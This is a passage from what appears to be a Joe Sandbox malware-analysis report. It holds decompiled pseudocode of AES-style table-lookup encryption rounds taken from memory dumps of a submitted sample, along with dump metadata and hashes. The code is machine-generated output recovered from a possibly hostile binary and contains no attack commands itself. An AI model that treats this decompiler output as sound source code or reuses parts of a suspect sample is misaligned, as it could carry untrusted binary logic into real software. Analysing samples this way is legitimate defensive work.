                                        					_t663 =  *(0xfc6c240 + (_t658 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t660 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t754 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
                                        					_t1090 =  &(_t1089[4]);
                                        					 *_t1181 = _t1090;
                                        					asm("rol eax, 0x10");
                                        					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
                                        					_t763 = _t762 >> 0x10;
                                        					_t666 = _t665 >> 0x10;
                                        					_t839 = _t838 >> 0x10;
                                        					_t771 = _t1090[2] ^  *(0xfc6c240 + (_t762 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t663 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t570 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t839 & 0x000000ff) * 4);
                                        					_t840 = _t1090[3] ^  *(0xfc6c240 + (_t838 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t762 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t570 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t666 & 0x000000ff) * 4);
                                        					_t1102 =  *_t1181;
                                        					_t578 =  *(0xfc6ca40 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t665 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t838 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
                                        					_t668 =  *(0xfc6c240 + (_t663 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t665 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
                                        					_t1103 =  &(_t1102[4]);
                                        					 *_t1181 = _t1103;
                                        					asm("rol eax, 0x10");
                                        					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
                                        					_t772 = _t771 >> 0x10;
                                        					_t671 = _t670 >> 0x10;
                                        					_t841 = _t840 >> 0x10;
                                        					_t780 = _t1103[2] ^  *(0xfc6c240 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t668 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t841 & 0x000000ff) * 4);
                                        					_t842 = _t1103[3] ^  *(0xfc6c240 + (_t840 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t671 & 0x000000ff) * 4);
                                        					_t1115 =  *_t1181;
                                        					_t586 =  *(0xfc6ca40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t670 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t840 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
                                        					_t673 =  *(0xfc6c240 + (_t668 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t670 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
                                        					_t1116 =  &(_t1115[4]);
                                        					 *_t1181 = _t1116;
                                        					asm("rol eax, 0x10");
                                        					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
                                        					_t781 = _t780 >> 0x10;
                                        					_t676 = _t675 >> 0x10;
                                        					_t843 = _t842 >> 0x10;
                                        					_t1128 =  *_t1181;
                                        					_t1129 = _t1181[7];
                                        					 *_t1129 =  *(0xfc6da40 + (_t781 & 0x000000ff) * 4) ^  *(0xfc6d240 + (_t675 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
                                        					_t1129[1] =  *(0xfc6d240 + (_t673 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t675 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t781 & 0x000000ff) * 4) ^  *(0xfc6da40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
                                        					_t1129[2] = _t1116[2] ^  *(0xfc6d240 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t673 & 0x000000ff) * 4) ^  *(0xfc6da40 + (_t586 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t843 & 0x000000ff) * 4);
                                        					_t1129[3] = _t1116[3] ^  *(0xfc6d240 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t586 & 0x000000ff) * 4) ^  *(0xfc6da40 + (_t676 & 0x000000ff) * 4);
                                        					_t595 = 0;
                                        				} else {
                                        					if(_t851 == 0xc0) {
                                        						L5:
                                        						_t1131 =  &(_t998[4]);
                                        						 *_t1181 = _t1131;
                                        						asm("rol eax, 0x10");
                                        						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
                                        						_t789 = _t699 >> 0x10;
                                        						_t682 = _t681 >> 0x10;
                                        						_t844 = _t824 >> 0x10;
                                        						_t797 = _t1131[2] ^  *(0xfc6c240 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t844 & 0x000000ff) * 4);
                                        						_t845 = _t1131[3] ^  *(0xfc6c240 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t682 & 0x000000ff) * 4);
                                        						_t1143 =  *_t1181;
                                        						_t603 =  *(0xfc6ca40 + (_t789 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t681 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
                                        						_t684 =  *(0xfc6c240 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t681 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t789 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
                                        						_t1144 =  &(_t1143[4]);
                                        						 *_t1181 = _t1144;
                                        						asm("rol eax, 0x10");
                                        						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
                                        						_t798 = _t797 >> 0x10;
                                        						_t687 = _t686 >> 0x10;
                                        						_t846 = _t845 >> 0x10;
                                        						_t699 = _t1144[2] ^  *(0xfc6c240 + (_t797 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t684 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t846 & 0x000000ff) * 4);
                                        						_t824 = _t1144[3] ^  *(0xfc6c240 + (_t845 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t797 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t687 & 0x000000ff) * 4);
                                        						_t998 =  *_t1181;
                                        						_t514 =  *(0xfc6ca40 + (_t798 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t686 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t845 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
                                        						_t628 =  *(0xfc6c240 + (_t684 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t686 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t798 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
                                        						goto L6;
                                        					} else {
                                        						if(_t851 == 0xe0) {
                                        							_t1156 =  &(_t998[4]);
                                        							 *_t1181 = _t1156;
                                        							asm("rol eax, 0x10");
                                        							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
                                        							_t806 = _t699 >> 0x10;
                                        							_t691 = _t690 >> 0x10;
                                        							_t847 = _t824 >> 0x10;
                                        							_t814 = _t1156[2] ^  *(0xfc6c240 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t847 & 0x000000ff) * 4);
                                        							_t848 = _t1156[3] ^  *(0xfc6c240 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t691 & 0x000000ff) * 4);
                                        							_t1168 =  *_t1181;
                                        							_t618 =  *(0xfc6ca40 + (_t806 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t690 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
                                        							_t693 =  *(0xfc6c240 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t690 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t806 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
                                        							_t1169 =  &(_t1168[4]);
                                        							 *_t1181 = _t1169;
                                        							asm("rol eax, 0x10");
                                        							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
                                        							_t815 = _t814 >> 0x10;
                                        							_t696 = _t695 >> 0x10;
                                        							_t849 = _t848 >> 0x10;
                                        							_t699 = _t1169[2] ^  *(0xfc6c240 + (_t814 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t693 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t618 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t849 & 0x000000ff) * 4);
                                        							_t824 = _t1169[3] ^  *(0xfc6c240 + (_t848 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t814 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t618 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t696 & 0x000000ff) * 4);
                                        							_t998 =  *_t1181;
                                        							_t514 =  *(0xfc6ca40 + (_t815 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t695 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t848 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
                                        							_t628 =  *(0xfc6c240 + (_t693 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t695 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t815 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
                                        							goto L5;
                                        						} else {
                                        							_t595 = 0xffffffff;
                                        						}
                                        					}
                                        				}
                                        				return _t595;
			}

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd8267fb1c1cfda638be47f7c74b44d4a61a09b784c2d868b0395b96607fdbff
                                        • Instruction ID: 5bf6f5cee82c2228139090f8a3e4c425d2874f8e4403cf0b6012c78e46d7cce1
                                        • Opcode Fuzzy Hash: fd8267fb1c1cfda638be47f7c74b44d4a61a09b784c2d868b0395b96607fdbff
                                        • Instruction Fuzzy Hash: 61723271C142E98FDB80EF6FE49613673A1EB50323B47852AEFC15B191D638B630AB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E0FC61020(signed int* __ebx, signed int* __edi, signed int* __esi) {
                                        				signed int _t513;
                                        				signed char _t515;
                                        				signed char _t516;
                                        				signed char _t518;
                                        				signed char _t520;
                                        				signed char _t521;
                                        				signed char _t523;
                                        				signed char _t525;
                                        				signed char _t526;
                                        				signed char _t528;
                                        				signed char _t530;
                                        				signed char _t531;
                                        				signed char _t533;
                                        				signed char _t535;
                                        				signed char _t536;
                                        				signed char _t538;
                                        				signed char _t540;
                                        				signed char _t541;
                                        				signed char _t543;
                                        				signed char _t545;
                                        				signed char _t546;
                                        				signed char _t548;
                                        				signed char _t550;
                                        				signed char _t551;
                                        				signed char _t553;
                                        				signed char _t555;
                                        				signed char _t556;
                                        				signed char _t558;
                                        				signed char _t560;
                                        				signed char _t561;
                                        				void* _t564;
                                        				signed char _t566;
                                        				signed char _t567;
                                        				signed char _t569;
                                        				signed char _t571;
                                        				signed char _t572;
                                        				signed char _t575;
                                        				signed char _t576;
                                        				signed char _t578;
                                        				signed char _t580;
                                        				signed char _t581;
                                        				signed int _t585;
                                        				signed char _t594;
                                        				signed char _t603;
                                        				signed char _t612;
                                        				signed char _t621;
                                        				signed char _t630;
                                        				signed char _t639;
                                        				signed char _t648;
                                        				signed char _t657;
                                        				signed char _t666;
                                        				signed char _t685;
                                        				signed char _t702;
                                        				signed int _t712;
                                        				signed char _t713;
                                        				signed char _t714;
                                        				signed char _t715;
                                        				signed char _t716;
                                        				signed char _t717;
                                        				signed char _t718;
                                        				signed char _t719;
                                        				signed char _t720;
                                        				signed char _t721;
                                        				signed char _t722;
                                        				signed char _t723;
                                        				signed char _t724;
                                        				signed char _t725;
                                        				signed char _t726;
                                        				signed char _t727;
                                        				signed char _t728;
                                        				signed char _t729;
                                        				signed char _t730;
                                        				signed char _t731;
                                        				signed char _t732;
                                        				signed char _t733;
                                        				signed char _t734;
                                        				signed char _t735;
                                        				signed char _t736;
                                        				signed char _t737;
                                        				signed int _t739;
                                        				signed char _t740;
                                        				signed char _t747;
                                        				signed char _t748;
                                        				signed char _t755;
                                        				signed char _t756;
                                        				signed char _t763;
                                        				signed char _t764;
                                        				signed char _t771;
                                        				signed char _t772;
                                        				signed char _t779;
                                        				signed char _t780;
                                        				signed char _t787;
                                        				signed char _t788;
                                        				signed char _t795;
                                        				signed char _t796;
                                        				signed char _t803;
                                        				signed char _t804;
                                        				signed char _t811;
                                        				signed char _t812;
                                        				signed int* _t819;
                                        				signed char _t820;
                                        				signed char _t827;
                                        				signed char _t828;
                                        				signed char _t835;
                                        				signed char _t842;
                                        				signed char _t843;
                                        				signed int _t851;
                                        				signed int* _t924;
                                        				signed int* _t996;
                                        				signed int* _t997;
                                        				signed int* _t998;
                                        				signed int* _t1010;
                                        				signed int* _t1011;
                                        				signed int* _t1023;
                                        				signed int* _t1024;
                                        				signed int* _t1036;
                                        				signed int* _t1037;
                                        				signed int* _t1049;
                                        				signed int* _t1050;
                                        				signed int* _t1062;
                                        				signed int* _t1063;
                                        				signed int* _t1075;
                                        				signed int* _t1076;
                                        				signed int* _t1088;
                                        				signed int* _t1089;
                                        				signed int* _t1101;
                                        				signed int* _t1102;
                                        				signed int* _t1114;
                                        				signed int* _t1115;
                                        				signed int* _t1127;
                                        				signed int* _t1129;
                                        				signed int* _t1141;
                                        				signed int* _t1142;
                                        				signed int* _t1154;
                                        				signed int* _t1166;
                                        				signed int* _t1167;
                                        				signed int** _t1179;
                                        
                                        				_t1179[4] = _t996;
                                        				_t1179[3] = __ebx;
                                        				_t1179[2] = __esi;
                                        				_t1179[1] = __edi;
                                        				_t924 = _t1179[6];
                                        				_t997 = _t1179[8];
                                        				_t851 = _t997[0x3c] & 0x000000ff;
                                        				_t513 =  *_t924 ^  *_t997;
                                        				_t585 = _t924[1] ^ _t997[1];
                                        				_t712 = _t924[2] ^ _t997[2];
                                        				_t739 = _t924[3] ^ _t997[3];
                                        				if(_t851 == 0xa0) {
                                        					L6:
                                        					_t998 =  &(_t997[4]);
                                        					 *_t1179 = _t998;
                                        					asm("rol ebx, 0x10");
                                        					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
                                        					_t740 = _t739 >> 0x10;
                                        					_t516 = _t515 >> 0x10;
                                        					_t713 = _t712 >> 0x10;
                                        					_t714 = _t998[2] ^  *(0xfc6a240 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t516 & 0x000000ff) * 4);
                                        					_t747 = _t998[3] ^  *(0xfc6a240 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t713 & 0x000000ff) * 4);
                                        					_t1010 =  *_t1179;
                                        					_t518 =  *(0xfc6a240 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t515 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t740 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
                                        					_t594 =  *(0xfc6aa40 + (_t740 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t515 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
                                        					_t1011 =  &(_t1010[4]);
                                        					 *_t1179 = _t1011;
                                        					asm("rol ebx, 0x10");
                                        					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
                                        					_t748 = _t747 >> 0x10;
                                        					_t521 = _t520 >> 0x10;
                                        					_t715 = _t714 >> 0x10;
                                        					_t716 = _t1011[2] ^  *(0xfc6a240 + (_t714 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t747 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t594 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t521 & 0x000000ff) * 4);
                                        					_t755 = _t1011[3] ^  *(0xfc6a240 + (_t747 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t518 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t594 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t715 & 0x000000ff) * 4);
                                        					_t1023 =  *_t1179;
                                        					_t523 =  *(0xfc6a240 + (_t518 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t520 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t748 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
                                        					_t603 =  *(0xfc6aa40 + (_t748 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t714 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t520 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
                                        					_t1024 =  &(_t1023[4]);
                                        					 *_t1179 = _t1024;
                                        					asm("rol ebx, 0x10");
                                        					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
                                        					_t756 = _t755 >> 0x10;
                                        					_t526 = _t525 >> 0x10;
                                        					_t717 = _t716 >> 0x10;
                                        					_t718 = _t1024[2] ^  *(0xfc6a240 + (_t716 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t755 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t526 & 0x000000ff) * 4);
                                        					_t763 = _t1024[3] ^  *(0xfc6a240 + (_t755 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t523 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t717 & 0x000000ff) * 4);
                                        					_t1036 =  *_t1179;
                                        					_t528 =  *(0xfc6a240 + (_t523 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t525 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t756 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
                                        					_t612 =  *(0xfc6aa40 + (_t756 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t716 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t525 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
                                        					_t1037 =  &(_t1036[4]);
                                        					 *_t1179 = _t1037;
                                        					asm("rol ebx, 0x10");
                                        					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
                                        					_t764 = _t763 >> 0x10;
                                        					_t531 = _t530 >> 0x10;
                                        					_t719 = _t718 >> 0x10;
                                        					_t720 = _t1037[2] ^  *(0xfc6a240 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t612 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t531 & 0x000000ff) * 4);
                                        					_t771 = _t1037[3] ^  *(0xfc6a240 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t528 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t612 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t719 & 0x000000ff) * 4);
                                        					_t1049 =  *_t1179;
                                        					_t533 =  *(0xfc6a240 + (_t528 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t764 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
                                        					_t621 =  *(0xfc6aa40 + (_t764 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
                                        					_t1050 =  &(_t1049[4]);
                                        					 *_t1179 = _t1050;
                                        					asm("rol ebx, 0x10");
                                        					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
                                        					_t772 = _t771 >> 0x10;
                                        					_t536 = _t535 >> 0x10;
                                        					_t721 = _t720 >> 0x10;
                                        					_t722 = _t1050[2] ^  *(0xfc6a240 + (_t720 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t621 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t536 & 0x000000ff) * 4);
                                        					_t779 = _t1050[3] ^  *(0xfc6a240 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t533 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t621 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t721 & 0x000000ff) * 4);
                                        					_t1062 =  *_t1179;
                                        					_t538 =  *(0xfc6a240 + (_t533 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t535 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
                                        					_t630 =  *(0xfc6aa40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t720 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t535 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
                                        					_t1063 =  &(_t1062[4]);
                                        					 *_t1179 = _t1063;
                                        					asm("rol ebx, 0x10");
                                        					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
                                        					_t780 = _t779 >> 0x10;
                                        					_t541 = _t540 >> 0x10;
                                        					_t723 = _t722 >> 0x10;
                                        					_t724 = _t1063[2] ^  *(0xfc6a240 + (_t722 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t779 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t541 & 0x000000ff) * 4);
                                        					_t787 = _t1063[3] ^  *(0xfc6a240 + (_t779 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t723 & 0x000000ff) * 4);
                                        					_t1075 =  *_t1179;
                                        					_t543 =  *(0xfc6a240 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t540 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
                                        					_t639 =  *(0xfc6aa40 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t722 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t540 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
                                        					_t1076 =  &(_t1075[4]);
                                        					 *_t1179 = _t1076;
                                        					asm("rol ebx, 0x10");
                                        					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
                                        					_t788 = _t787 >> 0x10;
                                        					_t546 = _t545 >> 0x10;
                                        					_t725 = _t724 >> 0x10;
                                        					_t726 = _t1076[2] ^  *(0xfc6a240 + (_t724 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t787 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t639 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t546 & 0x000000ff) * 4);
                                        					_t795 = _t1076[3] ^  *(0xfc6a240 + (_t787 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t543 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t639 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t725 & 0x000000ff) * 4);
                                        					_t1088 =  *_t1179;
                                        					_t548 =  *(0xfc6a240 + (_t543 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t545 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t788 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
                                        					_t648 =  *(0xfc6aa40 + (_t788 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t724 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t545 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
                                        					_t1089 =  &(_t1088[4]);
                                        					 *_t1179 = _t1089;
                                        					asm("rol ebx, 0x10");
                                        					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
                                        					_t796 = _t795 >> 0x10;
                                        					_t551 = _t550 >> 0x10;
                                        					_t727 = _t726 >> 0x10;
                                        					_t728 = _t1089[2] ^  *(0xfc6a240 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t795 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t551 & 0x000000ff) * 4);
                                        					_t803 = _t1089[3] ^  *(0xfc6a240 + (_t795 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t548 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t727 & 0x000000ff) * 4);
                                        					_t1101 =  *_t1179;
                                        					_t553 =  *(0xfc6a240 + (_t548 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t550 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t796 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
                                        					_t657 =  *(0xfc6aa40 + (_t796 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t550 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
                                        					_t1102 =  &(_t1101[4]);
                                        					 *_t1179 = _t1102;
                                        					asm("rol ebx, 0x10");
                                        					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
                                        					_t804 = _t803 >> 0x10;
                                        					_t556 = _t555 >> 0x10;
                                        					_t729 = _t728 >> 0x10;
                                        					_t730 = _t1102[2] ^  *(0xfc6a240 + (_t728 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t803 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t657 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t556 & 0x000000ff) * 4);
                                        					_t811 = _t1102[3] ^  *(0xfc6a240 + (_t803 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t553 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t657 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t729 & 0x000000ff) * 4);
                                        					_t1114 =  *_t1179;
